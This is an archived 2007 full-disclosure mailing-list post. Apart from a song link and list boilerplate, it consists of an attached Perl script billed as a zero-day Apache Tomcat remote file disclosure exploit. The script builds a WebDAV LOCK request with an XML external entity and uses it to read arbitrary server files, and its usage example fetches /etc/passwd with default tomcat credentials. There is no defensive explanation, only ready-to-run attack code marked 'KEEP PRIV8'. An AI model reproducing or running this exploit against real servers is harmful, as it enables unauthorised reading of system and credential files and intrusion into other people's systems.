[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Apache Tomcat Rem0Te FiLe DiscloSure ZeroDay
From: "kcope" <kingcope () gmx ! net>
Date: 2007-10-14 20:47:34
Message-ID: 20071014204734.161320 () gmx ! net
[Download RAW message or body]
(see attached)
Mikis Theodorakis & Grigoris Bithikotsis//Tis Dikaiosynis ilie noite:
http://kypros.org/Occupied_Cyprus/epiktitos/audio/patriotic/THEODORAKIS%20&%20BITHIKOTSIS%20-%20Tis%20Dikaiosynis%20Ilie%20Noite.mp3
(see attached)
signed,
eliteb0y/2007
--
Psssst! Schon vom neuen GMX MultiMessenger gehört?
Der kanns mit allen: http://www.gmx.net/de/go/multimessenger
["apache.pl" (application/octet-stream)]
#!/usr/bin/perl
#******************************************************
# Apache Tomcat Remote File Disclosure Zeroday Xploit
# kcdarookie aka eliteb0y / 2007
#
# thanx to the whole team & andi :)
# +++KEEP PRIV8+++
#
# This Bug may reside in different WebDav implementations,
# Warp your mind!
# +You will need auth for the exploit to work...
#******************************************************
use IO::Socket;
use MIME::Base64; ### FIXME! Maybe support other auths too ?
# SET REMOTE PORT HERE
$remoteport = 8080;
sub usage {
print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
print "kcdarookie aka eliteb0y / 2007\n";
print "usage: perl TOMCATXPL <remotehost> <webdav file> <file to retrieve> [username] [password]\n";
print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat\n";exit;
}
if ($#ARGV < 2) {usage();}
$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$remotefile = $ARGV[2];
$username = $ARGV[3];
$password = $ARGV[4];
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
PeerPort => $remoteport,
Proto => 'tcp');
$|=1;
$BasicAuth = encode_base64("$username:$password");
$KRADXmL =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
."]>\n"
."<D:lockinfo xmlns:D='DAV:'>\n"
."<D:lockscope><D:exclusive/></D:lockscope>\n"
."<D:locktype><D:write/></D:locktype>\n"
."<D:owner>\n"
."<D:href>\n"
."<REMOTE>\n"
."<RemoteX>&RemoteX;</RemoteX>\n"
."</REMOTE>\n"
."</D:href>\n"
."</D:owner>\n"
."</D:lockinfo>\n";
print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
print "kcdarookie aka eliteb0y / 2007\n";
print "Launching Remote Exploit...\n";
$ExploitRequest =
"LOCK $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n";
if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;
print $sock $ExploitRequest;
while(<$sock>) {
print;
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic